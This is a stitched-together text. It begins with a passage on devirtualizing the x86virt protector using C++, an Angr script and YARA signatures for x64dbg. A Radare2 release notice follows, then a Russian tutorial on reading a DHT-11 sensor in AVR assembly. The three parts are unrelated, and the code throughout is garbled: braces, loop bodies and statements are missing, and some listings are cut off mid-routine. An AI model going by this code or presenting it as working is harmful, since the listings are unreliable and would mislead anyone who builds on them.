An important note with this method is that it sorts the disassembled regions by their start address after doing the control flow analysis with getDisassembledRegions. This sorting must be done because the natural order was thrown out of whack by the queuing nature of the control flow analysis. Functionally, the order doesn’t really make a difference in a normal application because at the end of the day, the code is still going to execute the same way regardless of where the instructions are. However, the way in which the blocks are organized will change the size of the code once it is assembled in NASM due to the way jump instructions are encoded on the x86 platform. Essentially, the distance between the jump instructions and their destination addresses will change depending on the order of the code blocks in the function, and the distance will influence the size of the jump instruction. If the devirtualized code is not the size of its original form (i.e, before it is was passed into x86virt to be virtualized) or smaller, then it will not fit back into where it was ripped from. While functionally, it doesn’t matter that it isn’t in the «proper» location, it does matter later when we encounter multiple VM layers because our signatures will not match partial handlers etc.

Other than that, there isn’t anything too weird or noteworthy here until we encounter the call to eliminateVmr. Remember that I mentioned how x86virt creates a virtual register. We need to eliminate that because we cannot assemble that through NASM or produce valid x86 code while we have a virtual register. Below, we can see the behaviour of eliminateVmr:

vector<DecodedVmInstruction> eliminateVmr(vector<DecodedVmInstruction>& instructions) {
    auto itVmrStart = instructions.end();
    vector<DecodedVmInstruction> compactInstructionlist;

    for(auto it = instructions.begin(); it != instructions.end(); it++) {
        if(!strncmp("mov VMR,", it->disassembled, 8) && itVmrStart == instructions.end()) {
            itVmrStart = it;
        }else if(itVmrStart != instructions.end() && strstr(it->disassembled, "[VMR]") != 0)
            for(auto listing = itVmrStart; listing != it+1; listing++) {
                DecodedVmInstruction comment = *listing;
                comment.type = INSTR_COMMENT;
            compactInstructionlist.push_back(eliminateVmrFromSubset(itVmrStart, it + 1));
            itVmrStart = instructions.end();
        } else if (itVmrStart == instructions.end()) {

    return compactInstructionlist;

The way VMR is used in the virtualized code is fairly convenient. VMR is essentially used to calculate pointer addresses. For example, it only ever appears in a similar form to:

mov VMR, 0
add VMR, ecx
shl VMR, 2
add VMR, 15
mov eax, [VMR]

It always starts with operations on VMR and ends with VMR being dereferenced. This means that we can essentially replace all of those instructions with:

mov eax, [ecx * 2 + 15]

So eliminateVmr will look for a pattern where the destination operand is VMR and then some operations on VMR followed by a dereference on VMR. Everything between that pattern can always be simplified using the same algorithm. You can see the specifics of that algorithm in eliminateVmrFromSubset:

DecodedVmInstruction eliminateVmrFromSubset(vector<DecodedVmInstruction>::iterator start, vector<DecodedVmInstruction>::iterator end) {
    bool baseReg2Used = false;
    bool baseReg1Used = false;
    char baseReg1Buffer[10];
    char baseReg2Buffer[10];
    uint32_t multiplierReg1 = 1;
    uint32_t multiplierReg2 = 1;

    uint32_t offset = 0;

    for(auto it = start; it != end; it++) {
        char* dereferencePointer = 0;

        if(!strncmp(it->disassembled, "mov VMR, 0x", 11)) {
            offset = strtoul(&it->disassembled[11], NULL, 16);
            baseReg1Used = false;
            baseReg2Used = false;
            multiplierReg1 = multiplierReg2 = 1;
        } else if(!strncmp(it->disassembled, "mov VMR, ", 9)) {
            baseReg1Used = true;
            baseReg2Used = false;
            multiplierReg1 = multiplierReg2 = 1;
            offset = 0;
            strcpy(baseReg1Buffer, &it->disassembled[9]);
        } else if(!strncmp(it->disassembled, "add VMR, 0x", 11)) {
            offset += strtoul(&it->disassembled[11], NULL, 16);
        } else if(!strncmp(it->disassembled, "add VMR, ", 9)) {
            if(baseReg1Used) {
                baseReg2Used = true;
                strcpy(baseReg2Buffer, &it->disassembled[9]);
            } else {
                baseReg1Used = true;
                strcpy(baseReg1Buffer, &it->disassembled[9]);    
        } else if(!strncmp(it->disassembled, "shl VMR, 0x", 11)) {
            uint32_t shift = strtoul(&it->disassembled[11], NULL, 16);
            offset = offset << shift;
            if(baseReg1Used) {
                multiplierReg1 = multiplierReg1 << shift;
            if(baseReg2Used) {
                multiplierReg2 = multiplierReg2 << shift;

    auto lastInstruction = end - 1;
    string reconstructInstr(lastInstruction->disassembled);
    stringstream reconstructed;

    reconstructed << "[";

    if(baseReg1Used) {
        if(multiplierReg1 != 1)
            reconstructed << "0x" << hex << multiplierReg1 << " * ";

        reconstructed << baseReg1Buffer;

    if(baseReg2Used) {
        reconstructed << " + ";
        if(multiplierReg2 != 1)
            reconstructed << "0x" << hex << multiplierReg2 << " * ";

        reconstructed << baseReg2Buffer;

    if(offset != 0 || !(baseReg1Used))
        reconstructed <<  " + 0x" << hex << offset;

    reconstructed << "]";

    reconstructInstr.replace(reconstructInstr.find("[VMR]"), 5, reconstructed.str());

    DecodedVmInstruction result;

    result.isDecoded = true;
    result.address = start->address;
    result.size = 0;
    result.type = lastInstruction->type;
    strcpy(result.disassembled, reconstructInstr.c_str());

    return result;

Once VMR is eliminated, all that is left to do is print out the disassembly, which we can see being done here in disassembleStub:

    for(auto& i : eliminateVmr(instructions)) {

Generating a Jump Map with Angr

As I mentioned earlier, when it comes to the x86virt bytecode conditional / unconditional jump instruction handler, we need to extract the jump mappings (that is, which value in the jump type operand matches which type of jump). The way the x86virt jump handler works is that it takes the first operand (which is the jump type) and passes it into a somewhat randomly generated subroutine. This subroutine returns true if the EFLAGS are in a condition that permits jumping, or false otherwise.

Because this subroutine is not static and is a bit different for every VM Layer or virtualized target, we need some way of extracting these mappings out of that randomly generated subroutine. If you are not familiar with Angr or symbolic execution, I suggest you read a tiny bit on it before reading this section because the learning curve can be a bit steep.

The jump maps are extracted by running an Angr simulation on the jump decoder that was extracted from the protected application. The simulation is done in x86devirt_jmp.py and the dump of the decoder is provided by x86devirt.py (which we will get into later).

The way this was performed was first by creating a table of x86 jump types with EFLAG values that permit a jump to be taken for that jump type and EFLAG values that do not permit a jump to be taken. Additionally, all jump types in the table were prioritized.

Jump type priority worked by giving x86 jump types that test less flags a lower priority than jump types that test more flags. The reason jump types need to be prioritized is because there is overlap in the conditions that need to be checked for different jumps. An example of this is the JZ jump (ZF = 0) and the JA (ZF = 0 and CF = 0) jump. Essentially, if a set of x candidate x86 jump types can be mapped to a particular jump type y, then y should be mapped to the highest priority jump type in the set of x.

Below we see the list of possible jumps:

possibleJmps = [
        "name": "jz",
        "must": [0x40],
        "not": [0x1, 0],
        "priority": 1
        "name": "jo",
        "must": [0x800],
        "not": [0],
        "priority": 1

Below is the code responsible for mapping which emulated states permit jumping and which states do not, for all jump types (0-15):

def getJmpStatesMap(proj):
    statesMap = {}

    state = proj.factory.blank_state(addr=0x0)
    state.add_constraints(state.regs.edx >= 0)
    state.add_constraints(state.regs.edx <= 15)
    simgr = proj.factory.simulation_manager(state)
    r = simgr.explore(find=0xDA, avoid=0xDE, num_find=100)

    for state in r.found:
        val = state.solver.eval(state.regs.edx)
        val = val - 0xD
        val = val / 2

        if(not statesMap.has_key(val)):
            statesMap[val] = {"must": [], "not": []}


    state = proj.factory.blank_state(addr=0x0)
    state.add_constraints(state.regs.edx >= 0)
    state.add_constraints(state.regs.edx <= 15)
    simgr = proj.factory.simulation_manager(state)
    r = simgr.explore(find=0xDE, avoid=0xDA, num_find=100)

    for state in r.found:
        val = state.solver.eval(state.regs.edx)
        val = val - 0xD
        val = val / 2


    return statesMap

The method essentially performs the following:

  1. Iterate through all states that reach a positive/negative return (jump allowed or not allowed to be taken)
  2. Resolve the constraint on the jump type (Jump type is stored in EDX)
  3. Append that state to either the «must» set, which is states that reached a positive return permitting the jump to be taken (offset 0xDA in the dumped jump decoder code) or «not» (offset 0xDE in the dumped jump decoder code)

After we know which states permit jumping or restrict jumping for each jump type, we can begin testing the constraints on the EFLAGS register that allow for arriving at those states to determine which kind of x86 jump it maps to:

def decodeJumps(inputFile):
    proj = angr.Project(inputFile, main_opts={'backend': 'blob', 'custom_arch': 'i386'}, auto_load_libs=False)

    stateMap = getJmpStatesMap(proj)
    jumpMappings = {}
    for key, val in stateMap.iteritems():

        for jmp in possibleJmps:
            satisfiedMustsRemaining = len(jmp["must"])
            satisfiedNotsRemaining = len(jmp["not"])

            for state in val["must"]:
                for con in jmp["must"]:
                    if (state.solver.satisfiable(
                            extra_constraints=[state.regs.eax & controlFlowBits == con & controlFlowBits])):
                        satisfiedMustsRemaining -= 1;

            for state in val["not"]:
                for con in jmp["not"]:
                    if (state.solver.satisfiable(
                            extra_constraints=[state.regs.eax & controlFlowBits == con & controlFlowBits])):
                        satisfiedNotsRemaining -= 1;

            if(satisfiedMustsRemaining <= 0 and satisfiedNotsRemaining <= 0):
                if(not jumpMappings.has_key(key)):
                    jumpMappings[key] = []


    finalMap = {}
    for key, val in jumpMappings.iteritems():
        maxPriority = 0;
        jmpName = "NOE FOUND"
        for j in val:
            if(j["priority"] > maxPriority):
                maxPriority = j["priority"]
                jmpName = j["name"]
        finalMap[jmpName] = key
        print("Mapped " + str(key) + " to " + jmpName)

    return finalMap

For each possible x86virt jump type, we test against each candidate x86 jump type to see if the x86 jump’s «not» and «must» sets can be satisfied accordingly by the restrictions on the EFLAGS registers in each state. If all «not»s and «must»s are satisfied, then the x86 jump is added as a possible candidate for that jump type.

Later, we iterate through all candidate x86 jumps for each jump type and choose the one with the highest priority to be mapped to it.

Finding the Signatures in the Protected Binary & Dumping Required Data

Finally, on to the last module needed to devirtualize code. x86devirt.py is the x64dbgpy Python plugin that instructs x64dbg on how to devirtualize the target.

x86devirt uses YARA rules to locate sections of code in the protected application, including the VM Stub, the instruction handlers, etc… You can see these YARA rules in VmStub.yara, VmRef.yara and instructions.yara:

  1. VmStub.yara is the YARA signature of the Virtual Machine interpreter.
  2. VmRef.yara is the YARA signature to detect where the application passes control off to the interpreter to begin interpreting a section of x86virt bytecode.
  3. instructions.yara is a set of YARA signatures for the different x86 instruction handlers.

An important note with these signatures is that they must match the original VM Stub and the devirtualized code generated by x86devirt. For example, consider a target that has been virtualized using two VM layers. After the first layer has been devirtualized, there will be a new VM stub in plain x86 form (that is, the second layer of virtualization). These signatures need to detect that second layer. However, the second layer was assembled using a different environment than the first layer and thus we need to take care for some special x86 instruction encodings in our signature (some x86 instructions have more than one way of being encoded). For example, consider:

add eax, ebx ; Encoded as 03C3
add eax, ebx ; Encoded as 01D8

So, when developing our signatures, we need to keep in mind that NASM could choose either encoding. With YARA, I just masked out instructions like these. If you are ever developing a signature with these constraints, please look into this more. There are plenty of resources on this topic: https://www.strchr.com/machine_code_redundancy

When it comes to devirtualizing x86virt, we must perform the following:

  1. Locate all VM Stubs that are present in plain x86 form using the vmStub.yara YARA signature
  2. Extract the decryption routine from the VM Stub
  3. Locate all references to that VM Stub (i.e, all areas where the VM is invoked to begin virtualizing code)
  4. Through each reference, extract the address where the virtualized bytecode is, and where the original code was ripped from
  5. Emulate part of the VM Stub to locate all instruction handlers and their opcodes
  6. Apply the YARA signatures to identify which handler (and subsequently, opcode) maps to which instruction behaviour and produce the instruction / opcode mappings
  7. Locate the JXX instruction handler and dump the part of the handler responsible for testing whether, given the jump type and state of the EFLAGS, the jump is taken. This is passed to x86devirt_jmp.py to extract the jump mappings
  8. For each reference, dump the virtualized code around that references and, with the jmp mappings, instruction mappings and the decryption routine, feed it to the x86virt-disassembler to be disassembled
  9. Finally, run NASM on the disassembler output to produce a x86 binary blob that can be written into where the virtualized code was ripped from, therefore restoring the virtualized function to its original form
  10. Loop back and search for any newly unveiled VM stubs

This process, once completed, will leave the x64dbg debugger in a state that allows the application to be cleanly dumped without any need for the VM stub.


Radare2 2.6.9 (salty peas) has been relesaed!

DOWNLOAD Radare 2.6.9

Radare2 (also known as r2) is a complete framework for reverse-engineering and analyzing binaries; composed of a set of small utilities that can be used together or independently from the command line. Built around a disassembler for computer software which generates assembly language source code from machine-executable code, it supports a variety of executable formats for different processors and operating systems.

Radare2 webui.png

Supported architectures/formats[edit]

Как программировать Arduino на ассемблере

Читаем данные с датчика температуры DHT-11 на «голом» железе Arduino Uno ATmega328p используя только ассемблер

Попробуем на простом примере рассмотреть, как можно “хакнуть” Arduino Uno и начать писать программы в машинных кодах, т.е. на ассемблере для микроконтроллера ATmega328p. На данном микроконтроллере собственно и собрана большая часть недорогих «классических» плат «duino». Данный код также будет работать на практически любой demo плате на ATmega328p и после небольших возможных доработок на любой плате Arduino на Atmel AVR микроконтроллере. В примере я постарался подойти так близко к железу, как это только возможно. Для лучшего понимания того, как работает микроконтроллер не будем использовать какие-либо готовые библиотеки, а уж тем более Arduino IDE. В качестве учебно-тренировочной задачи попробуем сделать самое простое что только возможно — правильно и полезно подергать одной ногой микроконтроллера, ну то есть будем читать данные из датчика температуры и влажности DHT-11.

Arduino очень клевая штука, но многое из того что происходит с микроконтроллером специально спрятано в дебрях библиотек и среды Arduino для того чтобы не пугать новичков. Поигравшись с мигающим светодиодом я захотел понять, как микроконтроллер собственно работает. Помимо утоления чисто познавательного зуда, знание того как работает микроконтроллер и стандартные средства общения микроконтроллера с внешним миром — это называется «периферия», дает преимущество при написании кода как для Arduino так и при написания кода на С/Assembler для микроконтроллеров а также помогает создавать более эффективные программы. Итак, будем делать все наиболее близко к железу, у нас есть: плата совместимая с Arduino Uno, датчик DHT-11, три провода, Atmel Studio и машинные коды.

Для начало подготовим нужное оборудование.

Писать код будем в Atmel Studio 7 — бесплатно скачивается с сайта производителя микроконтроллера — Atmel.

Atmel Studio 7

Весь код запускался на клоне Arduino Uno — у меня это DFRduino Uno от DFRobot, на контроллере ATmega328p работающем на частоте 16 MHz — отличная надежная плата. Каких-либо отличий от стандартного Uno в процессе эксплуатации я не заметил. Похожая чорная плата от DFBobot, только “Mega” отлетала у меня 2 года в качестве управляющего контроллера квадрокоптера — куда ее только не заносило — проблем не было.

DFRduino Uno

Для просмотра сигналов длительностью в микросекунды (а это на минутку 1 миллионная доля секунды), я использовал штуку, которая называется “логический анализатор”. Конкретно, я использовал клон восьмиканального USBEE AX Pro. Как смотреть для отладки такие быстрые процессы без осциллографа или логического анализатора — на самом деле даже не знаю, ничего посоветовать не могу.

Прежде всего я подключил свой клон Uno — как я говорил у меня это DFRduino Uno к Atmel Studio 7 и решил попробовать помигать светодиодиком на ассемблере. Как подключить описанно много где, один из примеров по ссылке в конце. Код пишется прямо в студии, прошивать плату можно через USB порт используя привычные возможности загрузчика Arduino -через AVRDude. Можно шить и через внешний программатор, я пробовал на китайском USBASP, по факту у меня оба способа работали. В обоих случаях надо только правильно настроить прошивальщик AVRDude, пример моих настроек на картинке

Полная строка аргументов:
-C “C:\avrdude\avrdude.conf” -p atmega328p -c arduino -P COM7 115200 -U flash:w:”$(ProjectDir)Debug\$(TargetName).hex:i

В итоге, для простоты я остановился на прошивке через USB порт — это стандартный способ для Arduio. На моей UNO стоит чип ATmega 328P, его и надо указать при создании проекта. Нужно также выбрать порт к которому подключаем Arduino — на моем компьютере это был COM7.

Для того, чтобы просто помигать светодиодом никаких дополнительных подключений не нужно, будем использовать светодиод, размещенный на плате и подключенный к порту Arduino D13 — напомню, что это 5-ая ножка порта «PORTB» контроллера.

Подключаем плату через USB кабель к компьютеру, пишем код в студии, прошиваем прямо из студии. Основная проблема здесь собственно увидеть это мигание, поскольку контроллер фигачит на частоте 16 MHz и, если включать и выключать светодиод такой же частотой мы увидим тускло горящий светодиод и собственно все.

Для того чтобы увидеть, когда он светится и когда он потушен, мы зажжем светодиод и займем процессор какой-либо бесполезной работой на примерно 1 секунду. Саму задержку можно рассчитать вручную зная частоту — одна команда выполняется за 1 такт или используя специальный калькулятор по ссылки внизу. После установки задержки, код выполняющий примерно то же что делает классический «Blink» Arduino может выглядеть примерно так:

			sbi DDRB, 5	; PORT B, Pin 5 - на выход
			sbi PORTB, 5	; выставили на Pin 5 лог единицу

loop:						    ; delay 1000 ms
			ldi  r18, 82
			ldi  r19, 43
			ldi  r20, 0
L1:			dec  r20
			brne L1
			dec  r19
			brne L1
			dec  r18
			brne L1
			in R16, PORTB	; переключили XOR 5-ый бит в порту
			ldi R17, 0b00100000
			EOR R16, R17
			out PORTB, R16
			rjmp loop
еще раз — на моей плате светодиод Arduino (D13) сидит на 5 ноге порта PORTB ATmeg-и.

Но на самом деле так писать не очень хорошо, поскольку мы полностью похерили такие важные штуки как стек и вектор прерываний (о них — позже).

Ок, светодиодиком помигали, теперь для того чтобы практика работа с GPIO была более или менее осмысленной прочитаем значения с датчика DHT11 и сделаем это также целиком на ассемблере.

Для того чтобы прочитать данные из датчика нужно в правильной последовательность выставлять на рабочей линии датчика сигналы высокого и низкого уровня — собственно это и называется дергать ногой микроконтроллера. С одной стороны, ничего сложного, с другой стороны все какая-то осмысленная деятельность — меряем температуру и влажность — можно сказать сделали первый шаг к построению какой ни будь «Погодной станции» в будущем.

Забегая на один шаг вперед, хорошо бы понять, а что собственно с прочитанными данными будем делать? Ну хорошо прочитали мы значение датчика и установили значение переменной в памяти контроллера в 23 градуса по Цельсию, соответственно. Как посмотреть на эти цифры? Решение есть! Полученные данные я буду смотреть на большом компьютере выводя их через USART контроллера через виртуальный COM порт по USB кабелю прямо в терминальную программу типа PuTTY. Для того чтобы компьютер смог прочитать наши данные будем использовать преобразователь USB-TTL — такая штука которая и организует виртуальный COM порт в Windows.

Сама схема подключения может выглядеть примерно так:

Сигнальный вывод датчика подключен к ноге 2 (PIN2) порта PORTD контролера или (что то же самое) к выводу D2 Arduino. Он же через резистор 4.7 kOm “подтянут” на “плюс” питания. Плюс и минус датчика подключены — к соответствующим проводам питания. USB-TTL переходник подключен к выходу Tx USART порта Arduino, что значит PIN1 порта PORTD контроллера.

В собранном виде на breadboard:

Разбираемся с датчиком и смотрим datasheet. Сам по себе датчик несложный, и использует всего один сигнальный провод, который надо подтянуть через резистор к +5V — это будет базовый «высокий» уровень на линии. Если линия свободна — т.е. ни контроллер, ни датчик ничего не передают, на линии как раз и будет базовый «высокий» уровень. Когда датчик или контроллер что-то передают, то они занимают линию — устанавливают на линии «низкий» уровень на какое-то время. Всего датчик передает 5 байт. Байты датчик передает по очереди, сначала показатели влажности, потом температуры, завершает все контрольной суммой, это выглядит как “HHTTXX”, в общем смотрим datasheet. Пять байт — это 40 бит и каждый бит при передаче кодируется специальным образом.

Для упрощения, будет считать, что «высокий» уровень на линии — это «единица», а «низкий» соответственно «ноль». Согласно datasheet для начала работы с датчиком надо положить контроллером сигнальную линию на землю, т.е. получить «ноль» на линии и сделать это на период не менее чем 20 милсек (миллисекунд), а потом резко отпустить линию. В ответ — датчик должен выдать на сигнальную линию свою посылку, из сигналов высокого и низкого уровня разной длительности, которые кодируют нужные нам 40 бит. И, согласно datasheet, если мы удачно прочитаем эту посылку контроллером, то мы сразу поймем что: а) датчик собственно ответил, б) передал данные по влажности и температуре, с) передал контрольную сумму. В конце передачи датчик отпускает линию. Ну и в datasheet написано, что датчик можно опрашивать не чаще чем раз в секунду.

Итак, что должен сделать микроконтроллер, согласно datasheet, чтобы датчик ему ответил — нужно прижать линию на 20 миллисекунд, отпустить и быстро смотреть, что на линии:

Датчик должен ответить — положить линию в ноль на 80 микросекунд (мксек), потом отпустить на те же 80 мксек — это можно считать подтверждением того, что датчик на линии живой и откликается:

После этого, сразу же, по падению с высокого уровня на нижний датчик начинает передавать 40 отдельных бит. Каждый бит кодируются специальной посылкой, которая состоит из двух интервалов. Сначала датчик занимает линию (кладет ее в ноль) на определенное время — своего рода первый «полубит». Потом датчик отпускает линию (линия подтягивается к единице) тоже на определенное время — это типа второй «полубит». Длительность этих интервалов — «полубитов» в микросекундах кодирует что собственно пытается передать датчик: бит “ноль” или бит “единица”.

Рассмотрим описание битовой посылки: первый «полубит» всегда низкого уровня и фиксированной длительности — около 50 мксек. Длительность второго «полубита» определят, что датчик собственно передает.

Для передачи нуля используется сигнал высокого уровня длительностью 26–28 мксек:

Для передачи единицы, длительность сигнала высокого увеличивается до 70 микросекунд:

Мы не будет точно высчитывать длительность каждого интервала, нам вполне достаточно понимания, что если длительность второго «полубита» меньше чем первого — то закодирован ноль, если длительность второго «полубита» больше — то закодирована единица. Всего у нас 40 бит, каждый бит кодируется двумя импульсами, всего нам надо значит прочитать 80 интервалов. После того как прочитали 80 интервалов будем сравнить их попарно, первый “полубит” со вторым.

Вроде все просто, что же требуется от микроконтроллера для того чтобы прочитать данные с датчика? Получается нужно значит дернуть ногой в ноль, а потом просто считать всю длинную посылку с датчика на той же ноге. По ходу, будем разбирать посылку на «полу-биты», определяя где передается бит ноль, где единица. Потом соберем получившиеся биты, в байты, которые и будут ожидаемыми данными о влажности и температуре.

Ок, мы начали писать код и для начала попробуем проверить, а работает ли вообще датчик, для этого мы просто положим линию на 20 милсек и посмотрим на линии, что из этого получится логическим анализатором.


==========		DEFINES =======================================
; определения для порта, к которому подключем DHT11			
				.EQU DHT_InPort=PIND
				.EQU DHT_Direction=DDRD
				.EQU DHT_Direction_Pin=DDD2

				.DEF Tmp1=R16
				.DEF USART_ByteR=R17		; переменная для отправки байта через USART
				.DEF Tmp2=R18
				.DEF USART_BytesN=R19		; переменная - сколько байт отправить в USART
				.DEF Tmp3=R20
				.DEF Cycle_Count=R21		; счетчик циклов в Expect_X
				.DEF ERR_CODE=R22			; возврат ошибок из подпрограмм
				.DEF N_Cycles=R23			; счетчик в READ_CYCLES
				.DEF ACCUM=R24
				.DEF Tmp4=R25

Как я уже писал сам датчик подключен на 2 ногу порта D. В Arduino Uno это цифровой выход D2 (смотрим для проверки Arduino Pinout).

Все делаем тупо: инициализировали порт на выход, выставили ноль, подождали 20 миллисекунд, освободили линию, переключили ногу в режим чтения и ждем появление сигналов на ноге.

;============	DHD11 INIT =======================================
; после инициализации сразу !!!! надо считать ответ контроллера и собственно данные
DHT_INIT:		CLI	; еще раз, на всякий случай - критичная ко времени секция

				; сохранили X для использования в READ_CYCLES - там нет времени инициализировать
				LDI XH, High(CYCLES)	; загрузили старшйи байт адреса Cycles
				LDI XL, Low (CYCLES)	; загрузили младший байт адреса Cycles

				LDI Tmp1, (1<<DHT_Direction_Pin)
				OUT DHT_Direction, Tmp1			; порт D, Пин 2 на выход

				LDI Tmp1, (0<<DHT_Pin)
				OUT DHT_Port, Tmp1			; выставили 0 

				RCALL DELAY_20MS		; ждем 20 миллисекунд

				LDI Tmp1, (1<<DHT_Pin)		; освободили линию - выставили 1
				OUT DHT_Port, Tmp1	

				RCALL DELAY_10US		; ждем 10 микросекунд

				LDI Tmp1, (0<<DHT_Direction_Pin)		; порт D, Pin 2 на вход
				OUT DHT_Direction, Tmp1	
				LDI Tmp1,(1<<DHT_Pin)		; подтянули pull-up вход на вместе с внешним резистором на линии
				OUT DHT_Port, Tmp1		

; ждем ответа от сенсора - он должен положить линию в ноль на 80 us и отпустить на 80 us

Смотрим анализатором — а ответил ли датчик?

Да, ответ есть — вот те сигналы после нашего первого импульса в 20 милсек — это и есть ответ датчика. Для просмотра посылки я использовал китайский клон USBEE AX Pro который подключен к сигнальному проводу датчика.

Растянем масштаб так чтобы увидеть окончание нашего импульса в 20 милсек и лучше увидеть начало посылки от датчика — смотрим все как в datasheet — сначала датчик выставил низкий/высокий уровень по 80 мксек, потом начал передавать биты — а данном случае во втором «полубите» передается «0»

Значит датчик работает и данные нам прислал, теперь надо эти данные правильно прочитать. Поскольку задача у нас учебная, то и решать ее будем тупо в лоб. В момент ответа датчика, т.е. в момент перехода с высокого уровня в низкий, мы запустим цикл с счетчиком числа повторов нашего цикла. Внутри цикла, будем постоянно следить за уровнем сигнала на ноге. Итого, в цикле будем ждать, когда сигнал на ноге перейдет обратно на высокий уровень — тем самым определив длительность сигнала первого «полубита». Наш микроконтроллер работает на частоте 16 MHz и за период например в 50 микросекунд контроллер успеет выполнить около 800 инструкций. Когда на линии появится высокий уровень — то мы из цикла аккуратно выходим, а число повторов цикла, которые мы отсчитали с использованием счетчика — запоминаем в переменную.

После перехода сигнальной линии уже на высокий уровень мы делаем такую же операцию– считаем циклы, до момента когда датчик начнет передавать следующий бит и положит линию в низкий уровень. К счастью, нам не надо знать точный временной интервал наших импульсов, нам достаточно понимать, что один интервал больше другого. Понятно, что если датчик передает бит «ноль» то длительность второго «полубита» и соответственно число циклов, которые мы отсчитали будет меньше чем длительность первого «полубита». Если же датчик передал бит «единица», то число циклов которые мы насчитаем во время второго полубита будет больше чем в первым.

И для того что бы мы не висели вечно, если вдруг датчик не ответил или засбоил, сам цикл мы будем запускать на какой-то временной период, но который гарантированно больше самой длинной посылки, чтоб если датчик не ответил, то мы смогли выйти по тайм-ауту.

В данном случае показан пример для ситуации, когда у нас на линии был ноль, и мы считаем сколько раз мы в цикле мы считали состояние ноги контроллера, пока датчик не переключил линию в единицу.

;=============	EXPECT 1 =========================================
; крутимся в цикле ждем нужного состояния на пине
; когда появилось - выходим
; сообщаем сколько циклов ждали
; или сообщение об ошибке тайм оута если не дождались
EXPECT_1:		LDI Cycle_Count, 0			; загрузили счетчик циклов
			LDI ERR_CODE, 2			; Ошибка 2 - выход по тайм Out

			ldi  Tmp1, 2			; Загрузили 
			ldi  Tmp2, 169			; задержку 80 us

EXP1L1:			INC Cycle_Count			; увеличили счетчик циклов

			IN Tmp3, DHT_InPort		; читаем порт
			SBRC Tmp3, DHT_Pin	; Если 1 
			RJMP EXIT_EXPECT_1	; То выходим
			dec  Tmp2			; если нет то крутимся в задержке
			brne EXP1L1
			dec  Tmp1
			brne EXP1L1
			NOP					; Здесь выход по тайм out

EXIT_EXPECT_1:		LDI ERR_CODE, 1			; ошибка 1, все нормально, в Cycle_Count счетчик циклов

Аналогичная подпрограмма используется для того, чтобы посчитать сколько циклов у нас должно прокрутиться, пока датчик из состояния ноль на линии переложил линию в состояние единицы.

Для расчета временных задержек мы будет использовать тот же подход, который мы использовали при мигании светодиодом — подберем параметры пустого цикла для формирования нужной паузы. Я использовал специальный калькулятор. При желании можно посчитать число рабочих инструкций и вручную.

Памяти в нашем контроллере довольно много — аж 2 (Два) килобайта, так что мы не будем жлобствовать с памятью, и тупо сохраним данные счетчиков относительно наших 80 ( 40 бит, 2 интервала на бит) интервалов в память.

Объявим переменную

CYCLES: .byte 80 ; буфер для хранения числа циклов

И сохраним все считанные циклы в память.

;============== READ CYCLES ====================================
; читаем биты контроллера и сохраняем в Cycles 
READ_CYCLES:	LDI N_Cycles, 80			; читаем 80 циклов
		RCALL EXPECT_1				; Открутился 0
		ST X+, Cycles_Counter			; Сохранили число циклов 
		ST X+, Cycles_Counter			; Сохранили число циклов 
		DEC N_Cycles				; уменьшили счетчик
		BRNE READ					
		RET					; все циклы считали

Теперь, для отладки, попробуем посмотреть насколько удачно посчиталось длительность интервалов и понять действительно ли мы считали данные из датчика. Понятно, что число отсчитанных циклов первого «полубита» должно быть примерно одинаково у всех битовых посылок, а вот число циклов при отсчете второго «полубита» будет или существенно меньше, или наоборот существенно больше.

Для того чтобы передавать данные в большой компьютер будем использовать USART контроллера, который через USB кабель будет передавать данные в программу — терминал, например PuTTY. Передаем опять же тупо в лоб — засовываем байт в нужный регистр управления USART-а и ждем, когда он передастся. Для удобства я также использовал пару подпрограмм, типа — передать несколько байт, начиная с адреса в Y, ну и перевести каретку в терминале для красоты.

;============	SEND 1 BYTE VIA USART =====================
		SBRS Tmp1, UDRE0			; если регистр данных пустой
		STS UDR0, USART_ByteR		; то шлем байт из R17

;============	SEND CRLF VIA USART ===============================
		LDI USART_ByteR, $0A

;============	SEND N BYTES VIA USART ============================
; Y - что слать, USART_BytesN - сколько байт

Отправив в терминал число отсчётов для 80 интервалов, можно попробовать собрать собственно значащие биты. Делать будем как написано в учебнике, т.е. в datasheet — попарно сравним число циклов первого «полубита» с числом циклов второго. Если вторые пол-бита короче — значит это закодировать ноль, если длиннее — то единица. После сравнения биты накапливаем в аккумуляторе и сохраняем в память по-байтово начиная с адреса BITS.

;=============	GET BITS ===============================================
; Из Cycles делаем байты в  BITS				
GET_BITS:			LDI Tmp1, 5			; для пяти байт - готовим счетчики
				LDI Tmp2, 8			; для каждого бита
				LDI ZH, High(CYCLES)	; загрузили старшйи байт адреса Cycles
				LDI ZL, Low (CYCLES)	; загрузили младший байт адреса Cycles
				LDI YH, High(BITS)	; загрузили старший байт адреса BITS
				LDI YL, Low (BITS)	; загрузили младший байт адреса BITS

ACC:				LDI ACCUM, 0			; акамулятор инициализировали
				LDI Tmp2, 8			; для каждого бита

TO_ACC:				LSL ACCUM				; сдвинули влево
				LD Tmp3, Z+			; считали данные [i]
				LD Tmp4, Z+			; о циклах и [i+1]
				CP Tmp3, Tmp4			; сравнить первые пол бита с второй половину бита если положительно - то BITS=0, если отрицительно то BITS=1
				BRPL J_SHIFT		; если положительно (0) то просто сдвиг	
				ORI ACCUM, 1			; если отрицательно (1) то добавили 1
J_SHIFT:			DEC Tmp2				; повторить для 8 бит
				ST Y+, ACCUM			; сохранили акамулятор
				DEC Tmp1				; для пяти байт

Итак, здесь мы собрали в памяти начиная с метки BITS те пять байт, которые передал контроллер. Но работать с ними в таком формате не очень неудобно, поскольку в памяти это выглядит примерно, как:
34002100ХХ, где 34 — это влажность целая часть, 00 — данные после запятой влажности, 21 — температура, 00 — опять данные после запятой температуры, ХХ — контрольная сумма. А нам надо бы вывести в терминал красиво типа «Temperature = 21.00». Так что для удобства, растащим данные по отдельным переменным.


H10:			.byte 1		; чиcло - целая часть влажность
H01:			.byte 1		; число - дробная часть влажность
T10:			.byte 1		; число - целая часть температура в C
T01:			.byte 1		; число - дробная часть температура

И сохраняем байты из BITS в нужные переменные

;============	GET HnT DATA =========================================
; из BITS вытаскиваем цифры H10...
; !!! чуть хакнули, потому что H10 и дальше... лежат последовательно в памяти


				LDI XH, HIGH(H10)
				LDI XL, LOW(H10)
												; TODO - перевести на счетчик таки
				LD Tmp1, Z+			; Считали
				ST X+, Tmp1			; сохранили
				LD Tmp1, Z+			; Считали
				ST X+, Tmp1			; сохранили

				LD Tmp1, Z+			; Считали
				ST X+, Tmp1			; сохранили

				LD Tmp1, Z+			; Считали
				ST X+, Tmp1			; сохранили


